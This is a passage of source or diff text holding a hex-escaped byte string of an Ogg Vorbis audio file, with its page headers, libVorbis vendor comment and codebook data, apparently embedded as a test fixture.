+"\x4F\x67\x67\x53\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x00\x00\x00\x00\xC7\x72\x7C\x6F\x01\x1E\x01\x76\x6F\x72\x62\x69\x73\x00\x00\x00\x00\x05\x99\xAC\x00\x00\xFD\xFF\xCF\xFC\x09\xFF\x99\x0F\xF9\x0F\x8F\x7F\xB9\x01\x4F\x67\x67\x53\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x01\x00\x00\x00\x15\x5A\x7E\x0C\x11\x4A\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\x76\x6F\x72\x62\x69\x73\x00\x00\x00\x00\x58\x69\x70\x68\x2E\x4F\x72\x67\x20\x6C\x69\x62\x56\x6F\x72\x62\x69\x73\x20\x49\x20\x32\x30\x30\x32\x30\x37\x31\x37\x01\x00\x00\x00\x19\x00\x00\x00\x53\x6F\x6E\x79\x20\x4F\x67\x67\x20\x56\x6F\x72\x62\x69\x73\x20\x31\x2E\x30\x20\x46\x69\x6E\x61\x6C\x01\x05\x76\x6F\x72\x62\x69\x73\x29\x42\x43\x56\x01\x00\x08\x00\x00\x80\x22\x4C\x20\xC3\x80\xD0\x90\x55\x00\x00\x10\x00\x00\x80\xA8\x36\x14\x6B\xA9\xB1\xD6\x1A\x63\xA1\x28\x46\xD4\x62\x6A\x31\xC6\x18\x63\xE3\x2C\x46\x90\x62\x8B\x31\xC6\x18\x63\x8C\x31\xC6\x18\x63\x8C\x31\xC6\x18\x63\x20\x34\x64\x15\x00\x00\x04\x00\x40\x31\xEA\x15\x93\x9E\x42\xCC\x39\xE7\xDC\x18\xA6\x8D\x51\xDA\x29\xC7\x39\xE7\xDC\x18\xC5\x89\x30\x58\x21\xA5\xB9\xA5\x9A\x52\xCC\xA1\x93\x9C\x4A\xCA\x39\xE7\x1C\x08\x0D\x59\x05\x00\x00\x02\x00\x40\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x4A\x29\xA5\x94\x62\x8A\x29\xA6\x98\x62\x8A\x29\xA6\x98\x72\xCC\x31\xC7\x1C\x83\x0C\x32\xE8\xA4\x93\x4E\x3A\xE9\x24\xA4\x90\x42\x09\xA5\xA4\x92\x52\x4A\xAD\xC5\x1A\x6B\xEF\xBD\xF7\x9E\x7B\xEF\xBD\xF7\xDE\x7B\xEF\xBD\xF7\xDE\x7B\xEF\xBD\xF7\xDE\x7B\xCF\x39\x07\x42\x43\x56\x01\x00\x20\x00\x00\x04\x42\x06\x21\x84\x10\x42\x08\x21\x84\x14\x52\x48\x21\xA6\x98\x62\xCA\x29\xA7\x80\xD0\x90\x55\x00\x00\x20\x00\x80\x00\x00\x00\x00\x4B\xB1\x14\x4D\xD1\x1C\xCF\xF1\x1C\xCF\x11\x1D\x53\x12\x25\x53\x32\x25\x53\x72\x2D\xD7\x32\x2D\x53\x33\x3D\xD3\x33\x45\x55\x74\x55\x53\x55\x65\xD7\x75\x65\x53\x36\x65\x53\x36\x65\x55\x36\x65\x53\x36\x65\x53\x36\x65\xD5\x95\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x20\x34\x64\x15\x00\x20\x01\x00\xA0\x23\x39\x92\x23\x29\x8E\xE2\x38\x8E\xE3\x48\x92\x04\x84\x86\xAC\x02\x00\x64\x00\x00\x04\x00\x60\x28\x8A\xA3\x48\x8E\x24\x59\x92\x65\x59\x96\x67\x99\x9A\xE9\x99\x9E\x69\x9A\xA6\x69\x9A\xA6\x09\x84\x86\xAC\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\xA0\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\x66\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x40\x68\xC8\x2A\x00\x40\x02\x00\x40\xC7\x71\x1C\xC7\x71\x1C\xC7\x71\x1C\x47\x72\x24\x07\x08\x0D\x59\x05\x00\xC8\x00\x00\x08\x00\x40\x52\x24\xC5\x72\x34\x47\x73\x34\xC7\x73\x3C\x47\x74\x44\x47\x94\x4C\x49\x95\x5C\x4B\xB6\x64\x0D\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\x40\x33\x2C\x43\x53\x3C\x47\xB3\x44\x4D\xD4\x44\x51\xF4\x44\x4F\x14\x45\xD1\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x80\xD0\x90\x55\x00\x00\x04\x00\x00\x01\x9D\x66\x98\x6A\x80\x08\x33\x92\x59\x20\x34\x64\x15\x00\x80\x00\x00\x00\x10\x81\x0C\x53\x0C\x08\x0D\x59\x05\x00\x00\x04\x00\x00\x48\x91\xE4\x24\x89\x92\x93\x52\x4A\x39\x0C\x92\xC5\x24\xA9\x94\x93\x52\x4A\x79\x14\x93\x47\x35\xC9\x18\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\x0C\x92\xE5\x28\xA9\x94\x93\x52\x4A\x49\x8C\x92\xC5\x28\xA9\x52\x93\x52\x4A\x79\x94\x93\x27\x35\xC9\xD8\x93\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x59\x90\x92\x27\x2D\xE9\x1A\x94\x52\x4A\x49\x8E\x92\x06\x2D\xD9\xD4\x93\x52\x4A\x89\x52\x94\x28\x39\xD9\x9E\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\xF9\xA0\x94\x0F\x42\x29\xA5\x94\x52\x4A\xB9\xDA\x93\x6B\x3D\x29\xA5\x94\x52\x4A\x19\xA3\x94\xF0\x49\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\xCA\x08\x42\x43\x56\x01\x00\x40\x00\x00\x80\x71\xD6\x28\x87\xA2\x93\xE8\x7C\x71\x86\x72\xA6\x29\x48\x2A\x94\x26\x74\x6F\x92\xA3\xE4\x39\xC9\xAD\xB4\xDC\x9C\x6E\xC2\x39\xA7\x9B\x53\xCE\xF9\xE4\x9C\x73\x82\xD0\x90\x55\x00\x00\x20\x00\x00\x84\x10\x52\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x88\x21\x86\x18\x72\xC8\x29\xA7\xA0\x82\x0A\x2A\xA9\xA4\xA2\x8A\x2A\xAA\xAC\xB2\xCC\x32\xCB\x2C\xB3\xCC\x32\xCB\x2C\xB3\xCC\x32\xEB\xAC\xA3\x8E\x3A\x0B\x29\x84\x92\x42\x0B\xAD\xD5\x18\x6B\x8C\xB1\xD5\xDE\x9C\xB4\x35\x47\x29\x9D\x94\x52\x4A\x29\xA5\x94\xCE\x39\xE7\x9C\x20\x34\x64\x15\x00\x00\x02\x00\x40\x20\x64\x90\x41\x06\x19\x65\x14\x52\x88\x21\xA6\x9C\x72\xCA\x29\xA8\xA4\x92\x0A\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x10\x25\xD3\x31\x1D\xD1\x11\x15\xD1\x11\x1D\xD1\x11\x1D\xD1\x11\x1D\xCF\xF1\x1C\x4F\x12\x25\xD1\xF2\x2C\x51\x33\x3D\x53\x34\x4D\xD3\x55\x65\x57\x96\x75\xD9\x96\x6D\x57\x97\x75\x5B\x97\x7D\xDB\xB7\x75\xDB\xB6\x7D\xDD\xD8\x8D\xDF\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\x63\x08\x42\x43\x56\x01\x00\x20\x00\x00\x00\x42\x08\x21\x84\x14\x52\x48\x21\x85\x94\x62\x8A\x31\xE7\xA0\x83\x10\x42\x29\x81\xD0\x90\x55\x00\x00\x20\x00\x80\x00\x00\x00\x00\x45\x71\x14\xC7\x91\x1C\x49\x92\x24\x4B\xB2\x2C\xCD\xD2\x34\x4D\xD3\x34\x4F\xF4\x44\xCF\xF4\x54\xCF\x15\x65\xD1\x16\x6D\xCF\xF5\x6C\xD1\xF6\x5C\x4F\xF5\x54\x4F\x15\x55\x53\x35\x5D\xD3\x55\x5D\xD7\x75\x5D\xD5\x55\x65\x55\x76\x6D\xDB\xB6\x6D\xDB\xB6\x6D\xDB\xB6\x6D\xDB\xB6\x6D\xDB\xB6\x65\x20\x34\x64\x15\x00\x20\x01\x00\xA0\x23\x39\x92\x22\x29\x92\x22\x39\x8E\x23\x39\x92\x04\x84\x86\xAC\x02\x00\x64\x00\x00\x04\x00\xA0\x28\x8A\xE2\x38\x8E\xE4\x58\x92\x25\x69\x92\x28\x99\x96\x6A\xB9\x9A\xEC\xE9\x9E\x2E\xEA\xA2\x0E\x84\x86\xAC\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x60\x88\x86\x68\x88\x8E\x68\x89\x9A\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x40\x68\xC8\x2A\x00\x40\x02\x00\x40\x47\x72\x24\xC7\x52\x2C\x45\x52\x24\xC5\x72\x2C\x07\x08\x0D\x59\x05\x00\xC8\x00\x00\x08\x00\xC0\x31\x1C\x43\x52\x24\xC7\xB2\x2C\x4B\xD3\x34\xCF\xF3\x3C\x4F\xF4\x44\x51\x14\x45\xD3\x54\x4D\x15\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\x40\x51\x14\xCB\xB1\x1C\x49\xD2\x1C\x4F\x12\x1D\x51\x12\x25\xD1\x12\x25\x51\x13\x35\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x81\xD0\x90\x95\x00\x00\x19\x00\x00\x03\xB1\xF5\xD4\x72\xEE\x8D\xA0\x48\x2A\x47\xB5\xC6\xD4\x51\xE6\x24\x06\x61\x1A\x8A\xA0\x82\x18\x84\x0C\x15\x44\x88\x51\x0E\x26\x62\x0A\x19\x26\x39\x97\x0C\x3A\xA6\x98\xD4\x18\x4B\x2A\x1D\x73\x52\x6B\x4B\x25\x54\x48\x41\x0C\x36\xA6\x52\x29\xE5\xA8\x07\x42\x43\x56\x08\x00\xA1\x19\x00\x0E\xC7\x01\x24\xCD\x02\x24\x4B\x03\x00\x00\x00\x00\x00\x00\x00\x49\xD3\x00\xCD\xF3\x00\xCD\xF3\x00\x00\x00\x00\x00\x00\x00\x40\xD2\x34\xC0\xF2\x3C\x40\xF3\x3C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1C\x4D\x03\x34\xD1\x03\x34\xCF\x03\x00\x00\x00\x00\x00\x00\x00\x4D\xF4\x00\x4F\x34\x01\x4F\x14\x01\x00\x00\x00\x00\x00\x00\xC0\xF2\x3C\xC0\x33\x3D\xC0\x13\x4D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1C\x4D\x03\x34\xCF\x03\x34\xCF\x03\x00\x00\x00\x00\x00\x00\x00\xCB\xF3\x00\xCF\x14\x01\xCF\x33\x01\x00\x00\x00\x00\x00\x00\x40\xF3\x44\xC0\x13\x45\xC0\x33\x45\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x01\x0E\x00\x00\x01\x16\x42\xA1\x21\x2B\x02\x80\x38\x01\x00\x87\x24\x41\x92\x20\x49\xD0\x34\x80\x64\x59\xF0\x34\x68\x1A\x4C\x13\x20\x59\x16\x34\x0D\x9A\x06\xD3\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\xD2\x34\x68\x1A\x34\x0D\xA2\x08\x90\x34\x0D\x9A\x06\x4D\x83\x28\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x79\x1A\x34\x0D\x9A\x06\x51\x04\x48\x9A\x07\x4D\x83\xA6\x41\x14\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD0\x4C\x13\xA2\x08\x51\x84\x69\x02\x34\xD3\x84\x28\x42\x14\x61\x9A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xCA\x40\xA1\x21\x2B\x02\x80\x38\x01\x00\x87\xE2\x58\x16\x00\x00\x38\x92\x63\x59\x00\x00\xE0\x38\x8E\x65\x01\x00\x80\x65\x59\x9A\x06\x00\x00\x96\x65\x69\x1A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xCA\x40\xA1\x21\x2B\x01\x80\x28\x00\x00\x87\xA2\x58\x16\x70\x1C\xCB\x02\x8E\x63\x59\x40\x92\x2C\x0B\x60\x59\x00\xCD\x03\x68\x1A\x40\x14\x01\x80\x00\x00\x80\x02\x07\x00\x80\x00\x1B\x34\x25\x16\x07\x28\x34\x64\x25\x00\x10\x05\x00\xE0\x50\x14\xCB\xD2\x34\x51\xE4\x38\x9A\xA6\x69\xA2\xC8\x71\x34\x4D\xD3\x44\x91\x65\x69\x9A\xE7\x99\x26\x34\xCD\xF3\x4C\x13\x9E\xE7\x79\xA6\x09\xCF\xF3\x3C\xD3\x84\x69\x8A\xA2\xAA\x02\x51\x54\x55\x01\x00\x00\x05\x0E\x00\x00\x01\x36\x68\x4A\x2C\x0E\x50\x68\xC8\x4A\x00\x20\x24\x00\xC0\xE1\x38\x96\xE5\x79\x9E\x27\x8A\xA6\x68\x9A\xAA\xCA\x71\x34\xCD\xF3\x44\x51\x14\x4D\x53\x55\x55\x95\xE3\x58\x96\xE7\x89\xA2\x28\x9A\xA6\xAA\xBA\x2E\xCB\xD2\x34\xCF\x13\x45\x51\x34\x4D\x55\x75\x5D\x68\x9A\xE7\x89\xA2\x28\x9A\xA6\xAA\xBA\x2E\x3C\xCF\xF3\x44\xD1\x14\x4D\x55\x55\x5D\x17\x9E\xE7\x79\xA2\x68\x9A\xAA\xA9\xAA\xAE\x0B\x51\x14\x45\xD3\x34\x4D\x55\x55\x55\xD7\x05\xA2\x68\x9A\xA6\xA9\xAA\xAE\xEA\xBA\xC0\xF3\x44\xD1\x34\x55\xD5\x75\x5D\x17\x78\x9E\x28\x9A\xA6\xAA\xBA\xAE\xEB\x02\x51\x34\x4D\xD5\x54\x55\xD7\x75\x5D\x80\x69\x9A\xA6\xAA\xBA\xAE\xEC\x02\x54\x55\x55\x55\xD7\x75\x65\x17\xA0\xAA\xAA\xAA\xAA\xAE\x2B\xCB\x00\x55\x75\x5D\xD7\x75\x5D\x59\x06\xA0\xAA\xAE\xEB\xBA\xB2\x2C\x00\x00\xE0\xC0\x01\x00\x20\xC0\x08\x3A\xC9\xA8\xB2\x08\x1B\x4D\xB8\xF0\x00\x14\x1A\xB2\x22\x00\x88\x02\x00\x00\x8C\x51\x4A\x31\xA5\x0C\x63\x12\x42\x09\x21\x62\x4C\x42\x28\x21\x54\x52\x4A\x29\xA9\x94\x0A\x42\x29\xA5\x94\x50\x41\x28\xA1\xA4\x10\x32\x29\x29\xA5\x54\x4A\x05\xA1\x84\x50\x4A\xA8\x20\x94\x52\x4A\x29\x05\x00\x80\x1D\x38\x00\x80\x1D\x58\x08\x85\x86\xAC\x04\x00\xF2\x00\x00\x08\x63\x94\x62\xCC\x39\xE7\x24\x42\x4A\x31\xE6\x9C\x73\x12\x21\xA5\x18\x73\xCE\x39\xA9\x14\x63\xCE\x39\xE7\x9C\x94\x92\x31\xE7\x9C\x73\x4E\x4A\xC9\x98\x73\xCE\x39\x27\xA5\x64\xCC\x39\xE7\x9C\x93\x52\x3A\xE7\x9C\x73\xCE\x49\x29\xA5\x74\xCE\x39\xE7\xA4\x94\x52\x42\xE8\x9C\x83\x52\x4A\x29\x9D\x73\xCE\x39\x01\x00\x40\x05\x0E\x00\x00\x01\x36\x8A\x6C\x4E\x30\x12\x54\x68\xC8\x4A\x00\x20\x15\x00\xC0\xE0\x38\x96\xE5\x79\x9E\x27\x8A\xA6\x69\x49\x92\xA6\x79\x9E\x28\x9A\xA6\xAA\x6A\x92\xA4\x69\x9E\x27\x8A\xA6\xA9\xAA\x3C\xCF\xF3\x44\x51\x14\x4D\x53\x55\x79\x9E\xE7\x89\xA2\x28\x9A\xA6\xAA\x72\x5D\x51\x14\x45\xD3\x34\x4D\x55\xE5\xBA\xA2\x27\x8A\xA6\xA9\xAA\xAE\x0A\xD1\x14\x45\xD3\x54\x55\xD7\x85\x69\x8A\xA2\x69\xAA\xAA\xEB\x42\x96\x4D\xD3\x54\x5D\xD7\x75\x61\xDB\xA6\xA9\xAA\xAA\xEA\xBA\x40\x75\x55\xD5\x75\x5D\x19\xB8\xAE\xAA\xBA\xAE\x2C\x0B\x00\x00\x4F\x70\x00\x00\x2A\xB0\x61\x75\x84\x93\xA2\xB1\xC0\x42\x43\x56\x02\x00\x19\x00\x00\x84\x31\x08\x29\x84\x10\x52\x06\x21\xA4\x10\x42\x48\x29\x85\x90\x00\x00\x80\x01\x07\x00\x80\x00\x13\xCA\x40\xA1\x21\x2B\x01\x80\x54\x00\x00\x80\x10\x29\xA5\x94\x52\x4A\x29\x11\x63\x52\x4A\x29\xA5\x94\x52\x22\xE6\xA4\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\x21\x84\x50\x00\x20\x76\x85\x03\xC0\x4E\x84\x0D\xAB\x23\x9C\x14\x8D\x05\x16\x1A\xB2\x12\x00\x08\x07\x00\x00\x8C\x41\x8A\x31\x08\x29\xB5\xD6\x62\x85\x90\x62\xCE\x49\x49\x29\xC6\x18\x2B\x84\x18\x73\x8E\x4A\x4A\x2D\xB6\x18\x34\xE6\x1C\x84\x94\x5A\x6B\x31\xD7\xA0\x31\xE7\x20\xA4\xD2\x5A\x8C\x35\x06\xD5\x42\x28\xA5\xB5\x18\x6B\xAD\x35\xB8\x14\x3A\x2A\xA9\xC5\x18\x6B\xAD\x41\x08\x95\x52\x8A\x31\xC6\x1A\x73\x0D\x42\xA8\x92\x42\x6C\xB1\xE6\x9A\x6B\x10\xC2\xD6\xD4\x5A\xAC\xB5\xE7\x9C\x83\x10\x3A\xB7\x14\x53\x8C\x31\xF7\x1A\x84\x10\x42\xC6\x1A\x6B\xCD\xB9\xE7\x20\x84\x10\xB6\xD6\x56\x5B\xAF\xB9\x06\x21\x84\xF0\x41\xD6\x9A\x73\x0E\x3A\x08\x21\x84\x0F\xB2\xD6\x9A\x83\xCE\x05\x00\x98\x3C\x38\x00\x40\x25\xD8\x38\xC3\x4A\xD2\x59\xE1\x68\x70\xA1\x21\x2B\x01\x80\xDC\x00\x00\x04\x21\xA5\x18\x73\xCE\x39\x07\x21\x84\x10\x42\x08\x29\x42\x8C\x31\xE6\x9C\x73\x10\x42\x08\x21\x84\x52\x52\x84\x18\x63\xCC\x39\xE7\x20\x84\x10\x42\x08\x21\xA4\x8C\x31\xE6\x9C\x73\x10\x42\x08\xA1\x94\x52\x4A\x49\x29\x65\xCC\x39\xE7\x20\x84\x10\x42\x29\xA5\x94\x92\x52\xEA\x9C\x73\x10\x42\x08\xA1\x94\x52\x4A\x29\x25\xA5\xD4\x39\xE7\x20\x84\x10\x42\x09\xA5\x94\x52\x4A\x4A\xA9\x73\x0E\x42\x08\x21\x84\x52\x4A\x29\xA5\x94\x94\x52\x4A\x9D\x83\x10\x42\x28\xA5\x94\x52\x4A\x29\x29\xA5\x94\x42\x08\x21\x94\x52\x4A\x29\xA5\x94\x52\x52\x4A\x29\x85\x10\x42\x28\xA5\x94\x52\x4A\x29\xA5\xA4\x94\x52\x0A\x21\x84\x52\x4A\x29\xA5\x94\x52\x4A\x49\x29\xA5\x94\x52\x08\xA1\x94\x52\x4A\x29\xA5\x94\x92\x52\x4A\x29\xA5\x52\x4A\x29\xA5\x94\x52\x4A\x29\x25\xA5\x94\x52\x4A\xA5\x84\x52\x4A\x29\xA5\x94\x52\x4A\x4A\x29\xA5\x94\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x94\x52\x4A\x29\xA5\x54\x4A\x29\xA5\x94\x52\x4A\x29\x29\xA5\x94\x52\x4A\xA9\x94\x52\x4A\x29\xA5\x94\x52\x52\x4A\x29\xA5\x96\x52\x29\xA5\x94\x52\x4A\x29\xA5\xB4\xD4\x5A\x4A\x29\xA5\x52\x4A\x29\xA5\x94\x52\x4A\x49\x29\xA5\x94\x52\x4A\x29\x95\x52\x4A\x29\xA5\x94\x52\x00\x00\xD0\x81\x03\x00\x40\x80\x11\x95\x16\x62\xA7\x19\x57\x1E\x81\x23\x0A\x19\x26\xA0\x42\x43\x56\x02\x00\x64\x00\x00\x08\xA2\x14\x53\x4A\xAD\x45\x82\x2A\xC9\x9C\xC4\x5E\x42\x25\x15\x73\x90\x5A\x8A\x28\x93\x4E\x5A\x0E\xAE\x43\xD0\x20\xE6\xA4\x95\x8A\x39\x84\x94\x93\x54\x3A\x07\x95\x52\x0C\x4A\x2A\x21\x75\x4C\x29\x06\x29\x96\x1C\x42\xC6\x98\x93\x9C\x82\x4A\xA1\x63\x0E\x00\x00\x00\x41\x00\x00\x81\x90\x09\x04\x0A\xA0\xC0\x40\x06\x00\x1C\x20\x24\x48\x01\x00\x85\x05\x86\x0E\x11\x22\x40\x8C\x02\x03\xE3\xE2\xD2\x06\x00\x20\x08\x91\x19\x22\x11\xB1\x18\x24\x26\x54\x03\x45\xC5\x74\x00\xB0\xB8\xC0\x90\x0F\x00\x19\x1A\x1B\x69\x17\x17\xD0\x65\x80\x0B\xBA\xB8\xEB\x40\x08\x41\x08\x42\x10\x8B\x03\x28\x20\x01\x07\x27\xDC\xF0\xC4\x1B\x9E\x70\x83\x13\x74\x8A\x4A\x1D\x08\x00\x00\x00\x00\xC0\x03\x00\x3C\x00\x00\x24\x1B\x40\x44\x44\x34\x73\x1C\x1D\x1E\x1F\x20\x21\x22\x23\x24\x25\x4F\x67\x67\x53\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x02\x00\x00\x00\xAE\x93\x37\x92\x01\x3C\x26\x27\x28\x02\x00\x00\x00\x00\x80\x07\x00\x1F\x00\x00\x49\x0A\x10\x11\x11\xCD\x1C\x47\x87\xC7\x07\x48\x88\xC8\x08\x49\x89\xC9\x09\x4A\x00\x00\x20\x80\x00\x00\x00\x00\x00\x08\x20\x00\x01\x01\x01\x00\x00\x00\x00\x80\x00\x00\x00\x00\x01\x01\x4F\x67\x67\x53\x00\x00\xC0\x2C\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x03\x00\x00\x00\xAB\x0F\x1C\x9B\x1D\x53\x4E\xFF\x3F\xFF\x26\xFF\x37\xFF\x63\xFF\x3F\xFF\x32\xFF\x4E\x49\x53\x57\x52\xFF\x6F\xFF\x47\xFF\x40\xFF\x53\xFF\xE4\x82\xB5\x62\xCE\xC7\xAC\x76\xA3\x78\x8A\xCD\x9B\xC9\x9B\x5A\x21\x6A\xF0\x3C\x5C\x71\x10\x72\x34\x7D\x95\xF8\xF6\xF3\x23\x00\x70\xB3\x75\xF3\x6E\xFF\x7F\x46\xFE\xAF\xE6\x92\xDB\xFC\xFE\x8B\xA3\x17\x0B\xD6\xBF\xBE\x9E\x8F\xBF\x7F\xC5\x2F\xDF\xB6\x88\xEF\xCE\x4D\xD4\x66\xF0\xD6\x2F\xA7\xD4\x39\xB3\x15\xC8\xEA\xF6\x87\xEA\x23\x00\xD4\x8A\x05\x36\x66\x92\xD4\x26\xE0\xAC\x98\x62\x63\x3F\x56\x35\xAB\x7B\xD9\xC7\x77\xD2\xCA\x35\x7D\xC1\x75\xF3\x47\x00\xB0\xF2\x72\xFD\x69\x59\x66\xF6\x57\xD5\x4E\x8C\xE3\xFC\xCB\x9B\x7